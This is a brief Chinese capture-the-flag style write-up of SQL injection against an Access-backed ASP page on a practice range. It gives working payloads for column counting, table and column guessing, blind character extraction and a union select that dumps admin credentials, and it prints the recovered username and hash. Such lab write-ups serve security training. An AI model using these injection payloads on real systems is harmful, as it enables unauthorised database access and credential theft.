靶场环境:https://www.mozhe.cn/bug/detail/82
首先http://219.153.49.228:49543/new_list.asp?id=1 order by 4
到5的时候报错
数据库表有四列
接下来一段一段查:
查询方式如下:
查表:and exists (select * from 表名)
查列:and exists (select 列名 from 表名)
查数据:1.确定长度 2.确定asc数据(asc编码)
and (select top 1 len(列名) from admin)=5
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
因此逐步查询后如下:
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select * from admin) √ (这个表名需要猜,简单的靶场一般就是admin)猜错界面会显示为空白,猜正确界面正常显示
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select passwd from admin) √
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select id from admin) √
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select username from admin) √
猜出来以后需要猜username和passwd是orderby的第几列,因为是四个,穷举猜了一下,最后username是第二列,passwd是第三列
http://219.153.49.228:49543/new_list.asp?id=1 union select 1,username,passwd,4 from admin
爆出来账号:moke/7e6ec4fadf84938f cmd5解密后成功登陆后台
感觉Access相比较MySQL更加需要去猜,不像MySQL那样可以有根据的去猜。